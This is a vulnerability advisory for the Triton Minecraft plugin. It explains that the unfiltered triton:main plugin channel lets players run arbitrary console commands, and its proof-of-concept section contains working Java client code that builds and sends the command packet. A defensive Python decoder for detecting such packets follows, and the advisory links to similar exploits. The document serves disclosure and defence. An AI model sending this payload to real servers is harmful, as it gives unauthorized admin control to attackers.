Summary
A CustomPayload packet allows a malicious player to execute arbitrary commands on the Spigot/Bukkit/Paper console.
Details
When you enable bungeecord mode in the config, the plugin enables the proxy bridge and the server begins to broadcast the triton:main plugin channel.
This channel is used by Triton for communication between the proxy and the server (and vice versa), and allows, among other actions, telling the server to execute any command as the console.
Triton did not filter incoming plugin messaging packets from players, so a modded client could send a packet that would allow them to execute any command they wanted, easily gaining admin access to the server.
Combined with other plugins, this might allow for Privilege Escalation in the Minecraft server, and perhaps even an RCE in the machine itself.
Using this plugin channel, the malicious player is able to send a payload packet containing a byte (2) and a string (any Spigot command).
Other payloads could also be sent, which could mess with the server's translations, for instance, but those are less powerful than the above payload.
Proof of Concept
Demonstration video:
POC Video
Demonstration code:
    // This is for version 1.8, for later versions the code will change slightly
    private void triton(String command) {
        try {
            ByteArrayOutputStream b = new ByteArrayOutputStream();
            DataOutputStream out = new DataOutputStream(b);
            out.writeByte(2); // Sub Channel ID
            out.writeUTF(command); // Command
            PacketBuffer buffer = (new PacketBuffer(Unpooled.buffer()));
            buffer.writeBytes(b.toByteArray());
            mc.thePlayer.sendQueue.addToSendQueue(new C17PacketCustomPayload("triton:main", buffer));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
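As an added defensive example (not code from the advisory or from Triton), the following decoder parses the triton:main wire format shown above (one sub-channel byte followed by a DataOutputStream.writeUTF string, i.e. a 2-byte big-endian length plus Java modified UTF-8) so that a server-side logging or packet-inspection hook can flag console-command requests arriving on player connections, including truncated or malformed ones. The sub-channel label and the sample payloads are constructed for this example.

```python
import struct

TRITON_CHANNEL = "triton:main"
SUBCHANNEL_CONSOLE_COMMAND = 2  # sub-channel byte from the PoC; label is ours, not Triton's


def read_java_utf(data: bytes, offset: int) -> tuple[str, int]:
    """Decode a DataOutputStream.writeUTF string (2-byte big-endian length, then
    Java 'modified UTF-8'). Returns (text, offset just past the string)."""
    if offset + 2 > len(data):
        raise ValueError("truncated length prefix")
    (length,) = struct.unpack_from(">H", data, offset)
    start, end = offset + 2, offset + 2 + length
    if end > len(data):
        raise ValueError("declared length %d exceeds payload" % length)
    # Modified UTF-8 writes U+0000 as C0 80 and non-BMP characters as CESU-8 surrogate pairs.
    raw = data[start:end].replace(b"\xc0\x80", b"\x00")
    try:
        text = raw.decode("utf-8", "surrogatepass")
        text = text.encode("utf-16", "surrogatepass").decode("utf-16")  # re-join pairs
    except UnicodeDecodeError as exc:
        raise ValueError("malformed modified UTF-8") from exc
    return text, end


def inspect_plugin_message(channel: str, data: bytes) -> dict:
    """Classify one plugin message received on a player connection. A verdict of
    'console-command' means the payload asks the bridge to run a console command."""
    if channel != TRITON_CHANNEL:
        return {"verdict": "ignore", "channel": channel}
    if not data:
        return {"verdict": "malformed", "reason": "empty payload"}
    sub = data[0]
    if sub != SUBCHANNEL_CONSOLE_COMMAND:
        return {"verdict": "other-subchannel", "subchannel": sub}
    try:
        command, end = read_java_utf(data, 1)
    except ValueError as exc:
        return {"verdict": "malformed", "subchannel": sub, "reason": str(exc)}
    return {"verdict": "console-command", "subchannel": sub,
            "command": command, "trailing_bytes": len(data) - end}


if __name__ == "__main__":
    # Constructed sample payloads in the wire format the PoC above produces.
    for channel, payload in [("triton:main", b"\x02\x00\x04list"),
                             ("triton:main", b"\x02\x00\x40list"),
                             ("triton:main", b"\x01\x00\x02en"),
                             ("minecraft:brand", b"\x07vanilla")]:
        print(channel, payload.hex(), "->", inspect_plugin_message(channel, payload))
```

Any "console-command" verdict on a player connection is worth logging with the player identity and rejecting unless the bridge has verified the message came from the proxy.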
This is similar to these exploits:
https://github.com/ParadoxLegit/Skinsrestorer-Exploit
https://github.com/ParadoxLegit/AuthMeBridge-Exploit
Impact
This vulnerability impacts all Spigot/Bukkit/Paper servers using Triton that have bungeecord set to true in Triton's config.yml, whether or not they are behind BungeeCord or Velocity.